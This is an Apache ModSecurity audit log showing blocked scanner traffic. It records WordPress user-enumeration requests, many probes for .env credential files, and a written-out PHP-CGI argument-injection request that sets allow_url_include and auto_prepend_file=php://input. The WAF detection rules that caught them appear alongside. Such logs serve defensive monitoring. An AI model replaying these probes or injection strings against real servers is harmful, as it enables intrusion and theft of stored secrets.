Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd801227-Z-- --e8f45c65-A-- [26/Apr/2025:19:17:01 +0700] aAzOvdDEbIDiBZnoTx5jWgAAAFg 103.236.140.4 37860 103.236.140.4 8181 --e8f45c65-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.143 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e8f45c65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8f45c65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745669821169256 3591 (- - -) Stopwatch2: 1745669821169256 3591; combined=1510, p1=485, p2=994, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8f45c65-Z-- --2ad50128-A-- [26/Apr/2025:19:17:03 +0700] aAzOv9Q6lpQjDvc0F_PJHgAAAMo 103.236.140.4 37872 103.236.140.4 8181 --2ad50128-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.143 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2ad50128-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ad50128-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745669823549004 2779 (- - -) Stopwatch2: 1745669823549004 2779; combined=1229, p1=428, p2=772, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ad50128-Z-- --733f2a61-A-- [26/Apr/2025:19:17:05 +0700] aAzOwU3IXD9XJ6lrmIUGxQAAABA 103.236.140.4 37884 103.236.140.4 8181 --733f2a61-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.143 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --733f2a61-C-- demo.sayHello --733f2a61-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --733f2a61-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745669825949992 5233 (- - -) Stopwatch2: 1745669825949992 5233; combined=3963, p1=550, p2=3207, p3=22, p4=24, p5=93, sr=137, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --733f2a61-Z-- --d64dc016-A-- [26/Apr/2025:19:17:22 +0700] aAzO0tDEbIDiBZnoTx5jZAAAAFc 103.236.140.4 37952 103.236.140.4 8181 --d64dc016-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.143 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d64dc016-C-- demo.sayHello --d64dc016-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d64dc016-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745669842401195 6203 (- - -) Stopwatch2: 1745669842401195 6203; combined=4472, p1=523, p2=3699, p3=32, p4=35, p5=106, sr=80, sw=77, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d64dc016-Z-- --44c94938-A-- [26/Apr/2025:20:10:30 +0700] aAzbRtDEbIDiBZnoTx5n0QAAAEM 103.236.140.4 55610 103.236.140.4 8181 --44c94938-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G965U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --44c94938-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44c94938-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745673030904306 808 (- - -) Stopwatch2: 1745673030904306 808; combined=334, p1=295, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44c94938-Z-- --dec4b77c-A-- [26/Apr/2025:20:10:50 +0700] aAzbWtDEbIDiBZnoTx5n4wAAAFM 103.236.140.4 55694 103.236.140.4 8181 --dec4b77c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; Z971) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --dec4b77c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dec4b77c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745673050750462 748 (- - -) Stopwatch2: 1745673050750462 748; combined=292, p1=258, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dec4b77c-Z-- --c5982f3b-A-- [26/Apr/2025:20:42:37 +0700] aAzizU3IXD9XJ6lrmIUOEAAAAAQ 103.236.140.4 41182 103.236.140.4 8181 --c5982f3b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 44.220.175.104 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 44.220.175.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --c5982f3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5982f3b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745674957032632 743 (- - -) Stopwatch2: 1745674957032632 743; combined=290, p1=256, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5982f3b-Z-- --3e0d363b-A-- [26/Apr/2025:20:42:37 +0700] aAzizdQ6lpQjDvc0F_PQXAAAAMo 103.236.140.4 41188 103.236.140.4 8181 --3e0d363b-B-- GET /.env.prod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 44.220.175.104 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 44.220.175.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --3e0d363b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e0d363b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745674957498088 725 (- - -) Stopwatch2: 1745674957498088 725; combined=315, p1=278, p2=0, p3=0, p4=0, p5=36, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e0d363b-Z-- --a4554e51-A-- [26/Apr/2025:20:42:37 +0700] aAzizdDEbIDiBZnoTx5r8AAAAFE 103.236.140.4 41190 103.236.140.4 8181 --a4554e51-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 44.220.175.104 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 44.220.175.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --a4554e51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4554e51-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745674957781080 648 (- - -) Stopwatch2: 1745674957781080 648; combined=272, p1=242, p2=0, p3=0, p4=0, p5=30, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4554e51-Z-- --046c744f-A-- [26/Apr/2025:20:42:37 +0700] aAzizdDEbIDiBZnoTx5r8QAAAEk 103.236.140.4 41192 103.236.140.4 8181 --046c744f-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 44.220.175.104 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 44.220.175.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --046c744f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --046c744f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745674957878843 671 (- - -) Stopwatch2: 1745674957878843 671; combined=276, p1=226, p2=0, p3=0, p4=0, p5=50, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --046c744f-Z-- --d60b6e6d-A-- [26/Apr/2025:20:42:37 +0700] aAzizU3IXD9XJ6lrmIUOEQAAABU 103.236.140.4 41194 103.236.140.4 8181 --d60b6e6d-B-- GET /.env.old HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 44.220.175.104 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 44.220.175.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --d60b6e6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d60b6e6d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745674957984066 641 (- - -) Stopwatch2: 1745674957984066 641; combined=263, p1=236, p2=0, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d60b6e6d-Z-- --cfca1f52-A-- [26/Apr/2025:20:42:38 +0700] aAziztQ6lpQjDvc0F_PQXQAAAMw 103.236.140.4 41196 103.236.140.4 8181 --cfca1f52-B-- GET /.env.development HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 44.220.175.104 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 44.220.175.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --cfca1f52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfca1f52-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745674958124275 668 (- - -) Stopwatch2: 1745674958124275 668; combined=263, p1=224, p2=0, p3=0, p4=0, p5=39, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfca1f52-Z-- --0f69e832-A-- [26/Apr/2025:20:42:38 +0700] aAziztQ6lpQjDvc0F_PQXwAAANM 103.236.140.4 41202 103.236.140.4 8181 --0f69e832-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 44.220.175.104 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 44.220.175.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --0f69e832-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f69e832-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745674958443602 783 (- - -) Stopwatch2: 1745674958443602 783; combined=325, p1=285, p2=0, p3=0, p4=0, p5=39, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f69e832-Z-- --29887459-A-- [26/Apr/2025:20:42:38 +0700] aAziznGCMLWH05JCdxxAQwAAAIY 103.236.140.4 41204 103.236.140.4 8181 --29887459-B-- GET /website/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 44.220.175.104 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 44.220.175.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --29887459-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29887459-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745674958643407 932 (- - -) Stopwatch2: 1745674958643407 932; combined=350, p1=302, p2=0, p3=0, p4=0, p5=48, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29887459-Z-- --3ada3e0e-A-- [26/Apr/2025:21:16:40 +0700] aAzqyHGCMLWH05JCdxxBpwAAAI0 103.236.140.4 49168 103.236.140.4 8181 --3ada3e0e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.4.63 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.4.63 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --3ada3e0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ada3e0e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745677000034979 803 (- - -) Stopwatch2: 1745677000034979 803; combined=370, p1=332, p2=0, p3=0, p4=0, p5=37, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ada3e0e-Z-- --14671f04-A-- [26/Apr/2025:22:35:44 +0700] aAz9UHGCMLWH05JCdxxF-wAAAIM 103.236.140.4 39944 103.236.140.4 8181 --14671f04-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 46.101.111.185 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 46.101.111.185 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --14671f04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14671f04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745681744436785 858 (- - -) Stopwatch2: 1745681744436785 858; combined=296, p1=258, p2=0, p3=0, p4=0, p5=38, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14671f04-Z-- --73f64249-A-- [26/Apr/2025:22:57:59 +0700] aA0Ch03IXD9XJ6lrmIUWzgAAAA8 103.236.140.4 45108 103.236.140.4 8181 --73f64249-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 120.195.30.141 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 120.195.30.141 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --73f64249-C-- --73f64249-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73f64249-E-- --73f64249-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745683079791442 4940 (- - -) Stopwatch2: 1745683079791442 4940; combined=3171, p1=469, p2=2663, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73f64249-Z-- --c909737c-A-- [26/Apr/2025:22:58:58 +0700] aA0CwtDEbIDiBZnoTx5zVQAAAFA 103.236.140.4 45456 103.236.140.4 8181 --c909737c-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 147.182.149.75 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 147.182.149.75 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --c909737c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c909737c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745683138516818 770 (- - -) Stopwatch2: 1745683138516818 770; combined=293, p1=257, p2=0, p3=0, p4=0, p5=35, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c909737c-Z-- --0ee8775e-A-- [27/Apr/2025:01:37:30 +0700] aA0n6k3IXD9XJ6lrmIUqGgAAAAQ 103.236.140.4 57402 103.236.140.4 8181 --0ee8775e-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 88.151.34.37 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 88.151.34.37 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --0ee8775e-C-- --0ee8775e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ee8775e-E-- --0ee8775e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745692650641502 5065 (- - -) Stopwatch2: 1745692650641502 5065; combined=4056, p1=488, p2=3535, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ee8775e-Z-- --2840144b-A-- [27/Apr/2025:03:36:26 +0700] aA1DynGCMLWH05JCdxxfjwAAAIY 103.236.140.4 60966 